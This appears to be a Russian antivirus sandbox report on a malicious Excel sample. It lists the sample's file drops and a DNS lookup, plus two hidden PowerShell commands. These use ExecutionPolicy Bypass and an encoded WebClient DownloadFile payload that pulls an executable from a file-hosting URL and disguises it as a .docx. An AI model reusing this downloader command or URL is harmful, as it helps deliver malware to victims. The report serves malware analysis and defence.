Техническая информация
- https://a.pomf.cat/yspcsr.exe как %temp%\drv.docx
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -WindowStyle Hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaA...
- <Текущая директория>\d89f0000
- <PATH_SAMPLE>.xls
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -WindowStyle Hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaA...' (со скрытым окном)